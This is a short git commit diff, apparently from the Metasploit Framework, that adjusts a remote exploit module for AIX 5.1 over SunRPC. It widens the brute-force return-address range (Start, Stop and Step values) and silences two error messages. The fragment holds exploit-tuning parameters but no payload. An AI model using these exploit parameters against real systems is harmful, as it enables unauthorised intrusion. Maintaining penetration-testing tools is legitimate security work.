extended brute range, minor cleanups

git-svn-id: file:///home/svn/framework3/trunk@8426 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-02-09 04:15:15 +00:00
parent 55aaf69b4b
commit e7f7ac20ea
1 changed files with 4 additions and 7 deletions

View File

@ -59,11 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
'AIX' => '5.1',
'Bruteforce' =>
{
#'Start' => { 'Ret' => 0x20230168 },
#'Stop' => { 'Ret' => 0x20230168 },
'Start' => { 'Ret' => 0x2022dfc8 },
'Stop' => { 'Ret' => 0x2022dfc8 },
'Step' => 1024
'Stop' => { 'Ret' => 0x202302c8 },
'Step' => 600
}
}
],
@ -107,11 +105,10 @@ class Metasploit3 < Msf::Exploit::Remote
sunrpc_destroy
rescue Rex::Proto::SunRPC::RPCTimeout
print_error('RPCTimeout')
# print_error('RPCTimeout')
rescue EOFError
print_error('EOFError')
# print_error('EOFError')
end
end
end